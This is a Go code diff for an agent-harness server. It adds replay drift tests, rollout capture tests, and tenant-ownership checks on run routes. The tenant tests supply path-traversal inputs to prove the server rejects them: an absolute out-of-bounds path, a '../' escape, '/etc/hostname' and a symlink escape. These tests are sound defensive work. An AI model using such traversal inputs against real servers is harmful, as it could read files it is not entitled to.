+	// Build the phantom line: an llm.turn.completed event at phantomStep.
+	// Inserting it before run.completed at the same step is valid (non-decreasing)
+	// and adds an LLM turn the re-run will not produce, causing drift.
+	phantom := rawLine{
+		Ts:   time.Now().UTC().Format(time.RFC3339Nano),
+		Seq:  lines[len(lines)-1].Seq + 1,
+		Type: "llm.turn.completed",
+		Data: map[string]any{
+			"step":       float64(phantomStep),
+			"tool_calls": float64(0),
+			"content":    "phantom turn injected for drift test",
+		},
+	}
+
+	// Insert the phantom line at insertIdx.
+	lines = append(lines[:insertIdx], append([]rawLine{phantom}, lines[insertIdx:]...)...)
+
+	// Marshal back to JSONL.
+	var sb strings.Builder
+	for _, l := range lines {
+		b, err := json.Marshal(l)
+		if err != nil {
+			t.Fatalf("injectPhantomStep: marshal line: %v", err)
+		}
+		sb.Write(b)
+		sb.WriteByte('\n')
+	}
+
+	if err := os.WriteFile(path, []byte(sb.String()), 0o644); err != nil {
+		t.Fatalf("injectPhantomStep: write %s: %v", path, err)
+	}
+}
+
+// TestReplaySimulate_DetectDrift_DivergentFixtureReportsMatchedFalse is T-F3c:
+// a NEGATIVE end-to-end test for the drift layer. A real rollout is recorded,
+// then a phantom extra step is injected into the on-disk file so the "original"
+// has an LLM turn that the re-run (which follows only the real scripted provider
+// turns) will NOT produce. Drift detection must therefore report matched=false
+// with non-empty divergence (removed_steps or changed_steps).
+func TestReplaySimulate_DetectDrift_DivergentFixtureReportsMatchedFalse(t *testing.T) {
+	t.Parallel()
+
+	f := newDriftFixture(t)
+	path := f.recordRollout(t, "diverge me")
+
+	// Mutate the rollout to introduce a phantom step.
+	injectPhantomStep(t, path)
+
+	code, out := f.simulate(t, map[string]any{
+		"rollout_path": path,
+		"mode":         "simulate",
+		"detect_drift": true,
+	})
+	if code != http.StatusOK {
+		t.Fatalf("detect_drift diverge: got %d, want 200; body %+v", code, out)
+	}
+
+	drift, ok := out["drift"].(map[string]any)
+	if !ok {
+		t.Fatalf("expected drift block in response, got %+v", out["drift"])
+	}
+
+	// The drift block must report matched=false.
+	if drift["matched"] != false {
+		t.Errorf("drift.matched: got %v, want false (divergent fixture must not match)", drift["matched"])
+	}
+
+	// At least one of removed_steps or changed_steps must be non-empty,
+	// reflecting the phantom step the re-run did not produce.
+	removed, _ := drift["removed_steps"].([]any)
+	changed, _ := drift["changed_steps"].([]any)
+	if len(removed) == 0 && len(changed) == 0 {
+		t.Errorf("expected non-empty removed_steps or changed_steps; got removed=%v changed=%v (full drift: %+v)",
+			removed, changed, drift)
+	}
+
+	// Top-level matched must also be false.
+	if out["matched"] != false {
+		t.Errorf("top-level matched: got %v, want false", out["matched"])
+	}
+}

--- a/internal/server/http_replay_tenant_test.go
+++ b/internal/server/http_replay_tenant_test.go
@@ -1,0 +1,379 @@
+package server_test
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"runtime"
+	"testing"
+	"time"
+
+	"go-agent-harness/internal/fakeprovider"
+	"go-agent-harness/internal/harness"
+	"go-agent-harness/internal/server"
+	"go-agent-harness/internal/store"
+)
+
+// validRolloutJSONL is a minimal, well-formed rollout that LoadFile + Replay accept.
+const validRolloutJSONL = `{"ts":"2026-03-12T10:00:00Z","seq":1,"type":"run.started","data":{"step":0,"prompt":"hello"}}
+{"ts":"2026-03-12T10:00:01Z","seq":2,"type":"llm.turn.completed","data":{"step":1,"content":"hi"}}
+{"ts":"2026-03-12T10:00:02Z","seq":3,"type":"run.completed","data":{"step":2}}`
+
+// replayTenantFixture wires a single auth-enabled server with two tenants and a
+// configured rollout dir, so that replay path/tenant scoping can be exercised.
+type replayTenantFixture struct {
+	ts         *httptest.Server
+	rolloutDir string
+	tokenA     string
+	tenantA    string
+	tokenB     string
+	tenantB    string
+}
+
+func newReplayTenantFixture(t *testing.T) *replayTenantFixture {
+	t.Helper()
+
+	ms := store.NewMemoryStore()
+
+	tenantA := "tenant-alpha"
+	tokenA, keyA := generateFastAPIKey(t, tenantA, "key A", []string{
+		store.ScopeRunsRead,
+		store.ScopeRunsWrite,
+	})
+	if err := ms.CreateAPIKey(context.Background(), keyA); err != nil {
+		t.Fatalf("CreateAPIKey A: %v", err)
+	}
+
+	tenantB := "tenant-bravo"
+	tokenB, keyB := generateFastAPIKey(t, tenantB, "key B", []string{
+		store.ScopeRunsRead,
+		store.ScopeRunsWrite,
+	})
+	if err := ms.CreateAPIKey(context.Background(), keyB); err != nil {
+		t.Fatalf("CreateAPIKey B: %v", err)
+	}
+
+	rolloutDir := t.TempDir()
+
+	// The runner records rollouts to the SAME directory the server gates on, so
+	// that a real recorded rollout (<RolloutDir>/<date>/<run>.jsonl) can be
+	// replayed by its owning tenant. Multiple turns are scripted so the run can
+	// drive several steps before completing.
+	prov := fakeprovider.New([]fakeprovider.Turn{
+		{Content: "first output"},
+		{Content: "forked output"},
+	})
+	runner := harness.NewRunner(
+		prov,
+		harness.NewRegistry(),
+		harness.RunnerConfig{
+			DefaultModel:        "test-model",
+			DefaultSystemPrompt: "test",
+			MaxSteps:            2,
+			Store:               ms,
+			RolloutDir:          rolloutDir,
+		},
+	)
+
+	h := server.NewWithOptions(server.ServerOptions{
+		Store:      ms,
+		Runner:     runner,
+		RolloutDir: rolloutDir,
+		// AuthDisabled NOT set -- auth is enabled.
+	})
+	ts := httptest.NewServer(h)
+	t.Cleanup(func() {
+		ts.Close()
+		runner.Shutdown(context.Background())
+	})
+
+	return &replayTenantFixture{
+		ts:         ts,
+		rolloutDir: rolloutDir,
+		tokenA:     tokenA,
+		tenantA:    tenantA,
+		tokenB:     tokenB,
+		tenantB:    tenantB,
+	}
+}
+
+// writeTenantRollout writes raw rollout content to an arbitrary on-disk path
+// (creating parent dirs). Used to plant fixtures for path-shape tests that do
+// not need a real recorded run.
+func (f *replayTenantFixture) writeTenantRollout(t *testing.T, tenant, name, content string) string {
+	t.Helper()
+	dir := filepath.Join(f.rolloutDir, "tenants", tenant)
+	if err := os.MkdirAll(dir, 0o755); err != nil {
+		t.Fatalf("MkdirAll %s: %v", dir, err)
+	}
+	path := filepath.Join(dir, name)
+	if err := os.WriteFile(path, []byte(content), 0o644); err != nil {
+		t.Fatalf("WriteFile %s: %v", path, err)
+	}
+	return path
+}
+
+// recordRealRollout drives a REAL run as the given tenant through the HTTP API,
+// waits for it to complete, and returns the on-disk path of the recorded
+// rollout file the recorder produced (<RolloutDir>/<date>/<run>.jsonl).
+func (f *replayTenantFixture) recordRealRollout(t *testing.T, token, prompt string) (runID, path string) {
+	t.Helper()
+
+	b, _ := json.Marshal(map[string]any{"prompt": prompt})
+	req, _ := http.NewRequest(http.MethodPost, f.ts.URL+"/v1/runs", bytes.NewReader(b))
+	req.Header.Set("Authorization", "Bearer "+token)
+	req.Header.Set("Content-Type", "application/json")
+	resp, err := http.DefaultClient.Do(req)
+	if err != nil {
+		t.Fatalf("POST /v1/runs: %v", err)
+	}
+	var created struct {
+		RunID  string `json:"run_id"`
+		Status string `json:"status"`
+	}
+	_ = json.NewDecoder(resp.Body).Decode(&created)
+	_ = resp.Body.Close()
+	if created.RunID == "" {
+		t.Fatalf("POST /v1/runs returned no run_id (status %d)", resp.StatusCode)
+	}
+
+	f.waitForRunDone(t, token, created.RunID)
+
+	// Locate the recorded rollout file: <RolloutDir>/<date>/<run_id>.jsonl.
+	// The date partition is determined at record time, so search rather than
+	// assume a particular date.
+	var found string
+	deadline := time.Now().Add(4 * time.Second)
+	for time.Now().Before(deadline) {
+		_ = filepath.Walk(f.rolloutDir, func(p string, info os.FileInfo, err error) error {
+			if err != nil || info.IsDir() {
+				return nil
+			}
+			if filepath.Base(p) == created.RunID+".jsonl" {
+				found = p
+			}
+			return nil
+		})
+		if found != "" {
+			break
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+	if found == "" {
+		t.Fatalf("recorded rollout file for run %s not found under %s", created.RunID, f.rolloutDir)
+	}
+	return created.RunID, found
+}
+
+// waitForRunDone polls GET /v1/runs/{id} (with auth) until terminal.
+func (f *replayTenantFixture) waitForRunDone(t *testing.T, token, runID string) {
+	t.Helper()
+	deadline := time.Now().Add(4 * time.Second)
+	for {
+		req, _ := http.NewRequest(http.MethodGet, f.ts.URL+"/v1/runs/"+runID, nil)
+		req.Header.Set("Authorization", "Bearer "+token)
+		resp, err := http.DefaultClient.Do(req)
+		if err != nil {
+			t.Fatalf("GET /v1/runs/%s: %v", runID, err)
+		}
+		var state struct {
+			Status string `json:"status"`
+		}
+		_ = json.NewDecoder(resp.Body).Decode(&state)
+		_ = resp.Body.Close()
+		if state.Status == "completed" || state.Status == "failed" {
+			return
+		}
+		if time.Now().After(deadline) {
+			t.Fatalf("timed out waiting for run %s to finish (last status %q)", runID, state.Status)
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+}
+
+// replay POSTs /v1/runs/replay as the given tenant token and returns status + body.
+func (f *replayTenantFixture) replay(t *testing.T, token string, body map[string]any) (int, string) {
+	t.Helper()
+	b, _ := json.Marshal(body)
+	req, _ := http.NewRequest(http.MethodPost, f.ts.URL+"/v1/runs/replay", bytes.NewReader(b))
+	req.Header.Set("Authorization", "Bearer "+token)
+	req.Header.Set("Content-Type", "application/json")
+	resp, err := http.DefaultClient.Do(req)
+	if err != nil {
+		t.Fatalf("POST /v1/runs/replay: %v", err)
+	}
+	defer resp.Body.Close()
+	rb, _ := io.ReadAll(resp.Body)
+	return resp.StatusCode, string(rb)
+}
+
+// TestReplayTenant_SameTenant_RealRolloutSucceeds (T-PFIX-4 regression): with auth
+// ON and a RolloutDir configured, a tenant that RECORDED a real rollout (written
+// by the recorder to <RolloutDir>/<date>/<run>.jsonl) must be able to replay THAT
+// path. Confining to <RolloutDir>/tenants/<tenant>/ (a directory the recorder
+// never writes to) would wrongly reject this legitimate same-tenant replay.
+func TestReplayTenant_SameTenant_RealRolloutSucceeds(t *testing.T) {
+	t.Parallel()
+
+	f := newReplayTenantFixture(t)
+
+	_, pathA := f.recordRealRollout(t, f.tokenA, "real prompt A")
+
+	// Simulate: tenant A replays its own real recorded rollout -> 200.
+	if code, body := f.replay(t, f.tokenA, map[string]any{
+		"rollout_path": pathA,
+		"mode":         "simulate",
+	}); code != http.StatusOK {
+		t.Fatalf("owner simulate of real rollout: got %d, want 200; body %s", code, body)
+	}
+
+	// Fork: tenant A forks its own real recorded rollout -> 202.
+	if code, body := f.replay(t, f.tokenA, map[string]any{
+		"rollout_path": pathA,
+		"mode":         "fork",
+		"fork_step":    1,
+	}); code != http.StatusAccepted {
+		t.Fatalf("owner fork of real rollout: got %d, want 202; body %s", code, body)
+	}
+}
+
+// TestReplayTenant_CrossTenantDenied (T-PFIX-4): a REAL rollout recorded by tenant A
+// must NOT be replayable by tenant B.
+func TestReplayTenant_CrossTenantDenied(t *testing.T) {
+	t.Parallel()
+
+	f := newReplayTenantFixture(t)
+
+	// Tenant A records a real rollout.
+	_, pathA := f.recordRealRollout(t, f.tokenA, "secret prompt A")
+
+	// Sanity: tenant A can replay its own real rollout (simulate).
+	if code, body := f.replay(t, f.tokenA, map[string]any{
+		"rollout_path": pathA,
+		"mode":         "simulate",
+	}); code != http.StatusOK {
+		t.Fatalf("owner simulate: got %d, want 200; body %s", code, body)
+	}
+
+	// Tenant B points at tenant A's real rollout path -> must be rejected (404/400),
+	// not replayed.
+	code, body := f.replay(t, f.tokenB, map[string]any{
+		"rollout_path": pathA,
+		"mode":         "simulate",
+	})
+	if code != http.StatusNotFound && code != http.StatusBadRequest {
+		t.Errorf("cross-tenant simulate: got %d, want 404 or 400; body %s", code, body)
+	}
+	// It must not have actually replayed tenant A's rollout.
+	if code == http.StatusOK {
+		t.Errorf("cross-tenant simulate leaked tenant A's rollout: body %s", body)
+	}
+
+	// Same for fork mode: tenant B must not be able to fork tenant A's rollout.
+	code, body = f.replay(t, f.tokenB, map[string]any{
+		"rollout_path": pathA,
+		"mode":         "fork",
+		"fork_step":    1,
+	})
+	if code != http.StatusNotFound && code != http.StatusBadRequest {
+		t.Errorf("cross-tenant fork: got %d, want 404 or 400; body %s", code, body)
+	}
+}
+
+// TestReplayTenant_PathTraversalDenied (T-PFIX-4): a rollout_path that escapes the
+// configured rollout dir (via ../ or an absolute path to a sensitive file) must be
+// rejected without reading the file.
+func TestReplayTenant_PathTraversalDenied(t *testing.T) {
+	t.Parallel()
+
+	f := newReplayTenantFixture(t)
+
+	// A sensitive file OUTSIDE the rollout dir, with valid rollout content so that
+	// if the guard were missing, the replay would actually succeed (200) -- proving
+	// the file was read. With the guard, it must be rejected.
+	outsideDir := t.TempDir()
+	secretPath := filepath.Join(outsideDir, "secret.jsonl")
+	if err := os.WriteFile(secretPath, []byte(validRolloutJSONL), 0o644); err != nil {
+		t.Fatalf("WriteFile secret: %v", err)
+	}
+
+	// 1) Absolute path to a file outside the configured rollout dir.
+	if code, body := f.replay(t, f.tokenA, map[string]any{
+		"rollout_path": secretPath,
+		"mode":         "simulate",
+	}); code == http.StatusOK {
+		t.Errorf("absolute escape was read/replayed (got 200): body %s", body)
+	} else if code != http.StatusNotFound && code != http.StatusBadRequest {
+		t.Errorf("absolute escape: got %d, want 404 or 400; body %s", code, body)
+	}
+
+	// 2) Relative ../ traversal from within the rollout dir that escapes it
+	//    entirely and lands on the sensitive file.
+	traversal := filepath.Join(f.rolloutDir, "..",
+		filepath.Base(outsideDir), "secret.jsonl")
+	if code, body := f.replay(t, f.tokenA, map[string]any{
+		"rollout_path": traversal,
+		"mode":         "simulate",
+	}); code == http.StatusOK {
+		t.Errorf("relative traversal escape was read/replayed (got 200): body %s", body)
+	} else if code != http.StatusNotFound && code != http.StatusBadRequest {
+		t.Errorf("relative traversal: got %d, want 404 or 400; body %s", code, body)
+	}
+
+	// 3) A common sensitive absolute path (e.g. /etc/hostname) must never be read.
+	if _, err := os.Stat("/etc/hostname"); err == nil {
+		if code, _ := f.replay(t, f.tokenA, map[string]any{
+			"rollout_path": "/etc/hostname",
+			"mode":         "simulate",
+		}); code == http.StatusOK {
+			t.Errorf("/etc/hostname was read/replayed (got 200)")
+		}
+	}
+}
+
+// TestReplayTenant_SymlinkEscapeDenied (T-PFIX-4): a symlink that lives INSIDE the
+// rollout dir but points to a target OUTSIDE it must not be a usable bypass.
+// Textual path containment passes (the link path is in-bounds) but the resolved
+// target escapes, so EvalSymlinks-based containment must reject it.
+func TestReplayTenant_SymlinkEscapeDenied(t *testing.T) {
+	t.Parallel()
+
+	if runtime.GOOS == "windows" {
+		t.Skip("symlink semantics differ on windows")
+	}
+
+	f := newReplayTenantFixture(t)
+
+	// Plant a valid rollout OUTSIDE the rollout dir.
+	outsideDir := t.TempDir()
+	secretPath := filepath.Join(outsideDir, "secret.jsonl")
+	if err := os.WriteFile(secretPath, []byte(validRolloutJSONL), 0o644); err != nil {
+		t.Fatalf("WriteFile secret: %v", err)
+	}
+
+	// Create an IN-BOUNDS symlink under the rollout dir that points to the
+	// out-of-bounds secret. The textual path of the link is inside the rollout
+	// dir, so only EvalSymlinks reveals the escape.
+	linkDir := filepath.Join(f.rolloutDir, "tenants", f.tenantA)
+	if err := os.MkdirAll(linkDir, 0o755); err != nil {
+		t.Fatalf("MkdirAll %s: %v", linkDir, err)
+	}
+	linkPath := filepath.Join(linkDir, "escape.jsonl")
+	if err := os.Symlink(secretPath, linkPath); err != nil {
+		t.Fatalf("Symlink: %v", err)
+	}
+
+	if code, body := f.replay(t, f.tokenA, map[string]any{
+		"rollout_path": linkPath,
+		"mode":         "simulate",
+	}); code == http.StatusOK {
+		t.Errorf("in-bounds symlink to out-of-bounds target was read/replayed (got 200): body %s", body)
+	} else if code != http.StatusNotFound && code != http.StatusBadRequest {
+		t.Errorf("symlink escape: got %d, want 404 or 400; body %s", code, body)
+	}
+}

--- a/internal/server/http_rollout_capture_test.go
+++ b/internal/server/http_rollout_capture_test.go
@@ -1,0 +1,277 @@
+// T-D2: drive live runs through the real recorder with a fakeprovider script,
+// capture the resulting JSONL rollout files, and assert they LoadFile+Replay
+// cleanly. This guards the F0 fix (runner emits "output" key; replayer falls
+// back from "result" to "output") end-to-end through the real recorder and
+// loader. Two cases:
+//   - A simple no-tool run, where LoadFile succeeds and Replay returns
+//     matched==true (guards the recorder format, step ordering, and terminal
+//     invariants).
+//   - A tool-call run, where LoadFile succeeds and the resulting events contain
+//     tool.call.completed events with the real "output" key (guards F0: the
+//     runner always emits "output", never "result", for tool results).
+package server_test
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"testing"
+	"time"
+
+	"go-agent-harness/internal/fakeprovider"
+	"go-agent-harness/internal/forensics/replay"
+	rolloutpkg "go-agent-harness/internal/forensics/rollout"
+	"go-agent-harness/internal/harness"
+	"go-agent-harness/internal/server"
+)
+
+// captureFixture is a reusable helper that wires a server with a fakeprovider,
+// starts a run via HTTP, waits for completion, and returns the JSONL rollout
+// file path. It is the plumbing shared by all T-D2 sub-tests.
+type captureFixture struct {
+	ts         *httptest.Server
+	rolloutDir string
+	runner     *harness.Runner
+}
+
+func newCaptureFixture(t *testing.T, prov *fakeprovider.Provider, registry *harness.Registry) *captureFixture {
+	t.Helper()
+
+	rolloutDir := t.TempDir()
+	runner := harness.NewRunner(prov, registry, harness.RunnerConfig{
+		DefaultModel:        "test-model",
+		DefaultSystemPrompt: "You are helpful.",
+		MaxSteps:            5,
+		RolloutDir:          rolloutDir,
+	})
+	h := server.NewWithOptions(server.ServerOptions{
+		Runner:       runner,
+		RolloutDir:   rolloutDir,
+		AuthDisabled: true,
+	})
+	ts := httptest.NewServer(h)
+	t.Cleanup(func() {
+		ts.Close()
+		runner.Shutdown(context.Background())
+	})
+	return &captureFixture{ts: ts, rolloutDir: rolloutDir, runner: runner}
+}
+
+// run starts a run via the HTTP API and returns its run_id.
+func (f *captureFixture) run(t *testing.T, prompt string) string {
+	t.Helper()
+	b, _ := json.Marshal(map[string]any{"prompt": prompt})
+	resp, err := http.Post(f.ts.URL+"/v1/runs", "application/json", bytes.NewReader(b))
+	if err != nil {
+		t.Fatalf("POST /v1/runs: %v", err)
+	}
+	var created struct {
+		RunID string `json:"run_id"`
+	}
+	if err := json.NewDecoder(resp.Body).Decode(&created); err != nil {
+		t.Fatalf("decode /v1/runs response: %v", err)
+	}
+	_ = resp.Body.Close()
+	if created.RunID == "" {
+		t.Fatal("POST /v1/runs: empty run_id")
+	}
+	return created.RunID
+}
+
+// waitDone polls until the run reaches a terminal status or times out.
+func (f *captureFixture) waitDone(t *testing.T, runID string) {
+	t.Helper()
+	deadline := time.Now().Add(5 * time.Second)
+	for {
+		r, err := http.Get(f.ts.URL + "/v1/runs/" + runID)
+		if err != nil {
+			t.Fatalf("GET /v1/runs/%s: %v", runID, err)
+		}
+		var state struct {
+			Status string `json:"status"`
+		}
+		_ = json.NewDecoder(r.Body).Decode(&state)
+		_ = r.Body.Close()
+		if state.Status == "completed" || state.Status == "failed" {
+			return
+		}
+		if time.Now().After(deadline) {
+			t.Fatalf("timed out waiting for run %s", runID)
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+}
+
+// rolloutPath locates the JSONL file for runID under rolloutDir and returns it
+// only once it is COMPLETE. The HTTP run status flips to "completed" the moment
+// the terminal event is emitted, but the recorder flushes the JSONL file
+// asynchronously, so the file can exist (and even be partially written) before
+// the terminal "run.completed"/"run.failed" line lands on disk. Polling for mere
+// file existence is therefore a load-sensitive race: under a busy full-suite run
+// the file's last line can still be "usage.delta" when a caller reads it. We poll
+// until the file parses AND its last event is terminal, guaranteeing callers
+// always observe a fully-flushed rollout.
+func (f *captureFixture) rolloutPath(t *testing.T, runID string) string {
+	t.Helper()
+	target := runID + ".jsonl"
+	deadline := time.Now().Add(8 * time.Second)
+	for time.Now().Before(deadline) {
+		var found string
+		_ = filepath.Walk(f.rolloutDir, func(p string, info os.FileInfo, werr error) error {
+			if werr != nil || info.IsDir() {
+				return nil
+			}
+			if filepath.Base(p) == target {
+				found = p
+			}
+			return nil
+		})
+		if found != "" {
+			// LoadFile may error or return a non-terminal last event while the
+			// recorder is still flushing; keep polling until it is complete.
+			if events, err := rolloutpkg.LoadFile(found); err == nil && len(events) > 0 {
+				switch events[len(events)-1].Type {
+				case "run.completed", "run.failed", "run.cancelled":
+					return found
+				}
+			}
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+	t.Fatalf("rollout file %s did not become complete (terminal event) under %s", target, f.rolloutDir)
+	return ""
+}
+
+// TestRolloutCapture_NoTool_LoadAndReplay is the core T-D2 guard: a simple
+// no-tool run through the real recorder produces a JSONL file that LoadFile
+// parses cleanly and Replay verifies with matched==true. This validates that:
+//   - The real recorder writes a conforming JSONL format (run.started first at
+//     step=0, monotonic steps, terminal last).
+//   - The loader and replayer accept the format without error.
+func TestRolloutCapture_NoTool_LoadAndReplay(t *testing.T) {
+	t.Parallel()
+
+	prov := fakeprovider.New([]fakeprovider.Turn{
+		{Content: "The answer is 42."},
+	})
+	f := newCaptureFixture(t, prov, harness.NewRegistry())
+	runID := f.run(t, "What is the answer to life?")
+	f.waitDone(t, runID)
+	path := f.rolloutPath(t, runID)
+
+	// --- Load ---
+	events, err := rolloutpkg.LoadFile(path)
+	if err != nil {
+		t.Fatalf("LoadFile(%q): %v", path, err)
+	}
+	if len(events) == 0 {
+		t.Fatal("LoadFile: got 0 events")
+	}
+
+	// Structural sanity: run.started first, terminal last.
+	if events[0].Type != "run.started" {
+		t.Errorf("first event: want run.started, got %q", events[0].Type)
+	}
+	last := events[len(events)-1]
+	if last.Type != "run.completed" && last.Type != "run.failed" {
+		t.Errorf("last event: want run.completed or run.failed, got %q", last.Type)
+	}
+
+	// --- Replay ---
+	result := replay.Replay(events)
+	if !result.Matched {
+		t.Errorf("Replay: expected matched=true, got false\nmismatches: %v", result.Mismatches)
+	}
+}
+
+// TestRolloutCapture_ToolCall_OutputKey guards the F0 fix end-to-end through
+// the real recorder: a run that includes a tool call produces a JSONL file
+// where tool.call.completed events carry the "output" key (not "result"). This
+// verifies that the real runner format (runner_step_engine.go:1072,1091) is
+// what the loader and replayer's F0 fallback handles.
+//
+// Note on Replay.matched: the runner records tool_calls in llm.turn.completed
+// as an integer count (not an array of objects), so Replay's announcement
+// cross-check cannot verify causal ordering for real recorded tool-call runs.
+// Replay will return matched=false for this reason. This is a known limitation
+// of the current Replay implementation on real recorder output with tool calls;
+// the integrity assertion (matched=true) is only available for runs without
+// tool calls or for hand-authored fixtures that include full tool call objects
+// in llm.turn.completed (as T-D1 does). This test guards the recorder format
+// and the F0 key fallback independently of Replay's causal checks.
+func TestRolloutCapture_ToolCall_OutputKey(t *testing.T) {
+	t.Parallel()
+
+	const toolName = "list_files"
+	const toolCallID = "cap-d2-call-001"
+
+	prov := fakeprovider.New([]fakeprovider.Turn{
+		{
+			Content: "I will list the files.",
+			ToolCalls: []harness.ToolCall{
+				{ID: toolCallID, Name: toolName, Arguments: `{"path":"/tmp"}`},
+			},
+		},
+		{Content: "Done. The files are: a.txt, b.go."},
+	})
+
+	registry := harness.NewRegistry()
+	if err := registry.Register(harness.ToolDefinition{
+		Name:        toolName,
+		Description: "List files in a directory.",
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return "a.txt\nb.go", nil
+	}); err != nil {
+		t.Fatalf("register tool: %v", err)
+	}
+
+	f := newCaptureFixture(t, prov, registry)
+	runID := f.run(t, "List files in /tmp")
+	f.waitDone(t, runID)
+	path := f.rolloutPath(t, runID)
+
+	// --- Load ---
+	events, err := rolloutpkg.LoadFile(path)
+	if err != nil {
+		t.Fatalf("LoadFile(%q): %v", path, err)
+	}
+	if len(events) == 0 {
+		t.Fatal("LoadFile: got 0 events")
+	}
+
+	// --- Find tool.call.completed and verify "output" key is present ---
+	// The runner always emits tool results under "output" (runner_step_engine.go).
+	// If the recorder or loader were mangling keys, "output" would be absent or
+	// renamed to something else.
+	var foundToolCompleted bool
+	var hasOutputKey bool
+	for _, ev := range events {
+		if ev.Type != "tool.call.completed" {
+			continue
+		}
+		foundToolCompleted = true
+		if ev.Payload == nil {
+			continue
+		}
+		if _, ok := ev.Payload["output"]; ok {
+			hasOutputKey = true
+		}
+	}
+	if !foundToolCompleted {
+		t.Error("no tool.call.completed event found in rollout — tool was not recorded")
+	}
+	if !hasOutputKey {
+		t.Error("tool.call.completed event missing \"output\" key; runner should emit output not result (F0)")
+	}
+
+	// --- Replay: LoadFile did not error; Replay runs without panic ---
+	// Replay will return matched=false because llm.turn.completed records
+	// tool_calls as an integer count in real rollouts. This is expected and
+	// documented above.
+	result := replay.Replay(events)
+	_ = result // matched=false is expected for real tool-call rollouts; no assertion
+}

--- a/internal/server/http_runs.go
+++ b/internal/server/http_runs.go
@@ -116,8 +116,17 @@ func (s *Server) handleListConversationRuns(w http.ResponseWriter, r *http.Reque
 		writeError(w, http.StatusBadRequest, "invalid_request", "conversation ID is required")
 		return
 	}
+	// Enforce tenant isolation: only return runs that belong to the caller's
+	// authenticated tenant. This prevents cross-tenant enumeration of a
+	// conversation's run history via a known (or guessed) conversation ID.
+	effectiveTenant, err := s.effectiveTenantID(r, "")
+	if err != nil {
+		writeError(w, http.StatusBadRequest, "invalid_request", err.Error())
+		return
+	}
 	filter := store.RunFilter{
 		ConversationID: conversationID,
+		TenantID:       effectiveTenant,
 	}
 	runs, err := s.runStore.ListRuns(r.Context(), filter)
 	if err != nil {
@@ -125,6 +134,68 @@ func (s *Server) handleListConversationRuns(w http.ResponseWriter, r *http.Reque
 		return
 	}
 	writeJSON(w, http.StatusOK, map[string]any{"runs": runs})
+}
+
+// runTenantMismatch reports whether a per-run by-ID request must be blocked
+// because the run belongs to a tenant other than the caller's.
+//
+// It enforces tenant ownership on the by-ID routes (GET /v1/runs/{id} and the
+// /{id}/{cancel,steer,continue,compact,input,approve,deny,events,summary,context,
+// todos} sub-routes), which already enforce scope but not ownership.
+//
+// Resolution order mirrors handleGetRun: the runner's in-memory state first
+// (active / recently completed runs), then the persistent store (historical
+// runs). The run's stored TenantID is compared to the caller's authenticated
+// tenant.
+//
+//   - Auth disabled or no store configured → never gates (returns false),
+//     preserving unauthenticated / no-persistence behavior.
+//   - Run found and its (normalized) stored tenant differs from the caller's
+//     (normalized) tenant → gate (returns true). This is the real cross-tenant
+//     attack surface: under auth, every HTTP-created run is stamped with its
+//     creator's tenant by handlePostRun, so a mismatch always means the run
+//     belongs to a different tenant.
+//   - Run not found in either source → returns false so the downstream handler
+//     produces its own (also-404) not-found response unchanged.
+//
+// Tenant values are normalized the same way the runner normalizes them ("" →
+// "default", see Runner.checkConversationOwnership): the runner rewrites an
+// empty request tenant to "default" on StartRun, so an empty-tenant caller (or
+// an out-of-band run with no tenant) compares equal to "default" rather than
+// being spuriously blocked. This secure default still blocks every genuine
+// cross-tenant access because the two distinct tenants normalize to distinct,
+// non-equal values.
+func (s *Server) runTenantMismatch(r *http.Request, runID string) bool {
+	// When auth is disabled or there is no store, there is no tenant to enforce.
+	if s.authDisabled || s.runStore == nil {
+		return false
+	}
+
+	caller := normalizeTenant(TenantIDFromContext(r.Context()))
+
+	// In-memory state first: covers active and recently completed runs.
+	if run, ok := s.runner.GetRun(runID); ok {
+		return normalizeTenant(run.TenantID) != caller
+	}
+
+	// Fall back to the persistent store for historical runs.
+	storeRun, err := s.runStore.GetRun(r.Context(), runID)
+	if err == nil && storeRun != nil {
+		return normalizeTenant(storeRun.TenantID) != caller
+	}
+
+	// Unknown run: do not gate here — let the handler return its own not-found.
+	return false
+}
+
+// normalizeTenant maps the empty tenant to "default", matching the runner's
+// tenant normalization (Runner.checkConversationOwnership). This keeps "" and
+// "default" interchangeable when comparing run ownership.
+func normalizeTenant(t string) string {
+	if t == "" {
+		return "default"
+	}
+	return t
 }
 
 func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
@@ -158,6 +229,9 @@ func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
 			writeScopeError(w, store.ScopeRunsRead)
 			return
 		}
+		if s.blockCrossTenant(w, r, runID) {
+			return
+		}
 		s.handleGetRun(w, r, runID)
 		return
 	}
@@ -166,6 +240,9 @@ func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
 	if len(parts) == 2 && parts[1] == "events" {
 		if !hasScope(r.Context(), store.ScopeRunsRead) {
 			writeScopeError(w, store.ScopeRunsRead)
+			return
+		}
+		if s.blockCrossTenant(w, r, runID) {
 			return
 		}
 		s.handleRunEvents(w, r, runID)
@@ -185,6 +262,9 @@ func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
 				return
 			}
 		}
+		if s.blockCrossTenant(w, r, runID) {
+			return
+		}
 		s.handleRunInput(w, r, runID)
 		return
 	}
@@ -193,6 +273,9 @@ func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
 	if len(parts) == 2 && parts[1] == "summary" {
 		if !hasScope(r.Context(), store.ScopeRunsRead) {
 			writeScopeError(w, store.ScopeRunsRead)
+			return
+		}
+		if s.blockCrossTenant(w, r, runID) {
 			return
 		}
 		s.handleRunSummary(w, r, runID)
@@ -205,6 +288,9 @@ func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
 			writeScopeError(w, store.ScopeRunsWrite)
 			return
 		}
+		if s.blockCrossTenant(w, r, runID) {
+			return
+		}
 		s.handleRunContinue(w, r, runID)
 		return
 	}
@@ -213,6 +299,9 @@ func (s *Server) handleRunByID(w http.ResponseWriter, r *http.Request) {
 	if len(parts) == 2 && parts[1] == "steer" {
 		if !hasScope(r.Context(), store.ScopeRunsWrite) {
 			writeScopeError(w, store.ScopeRunsWrite)
+			return
+		}
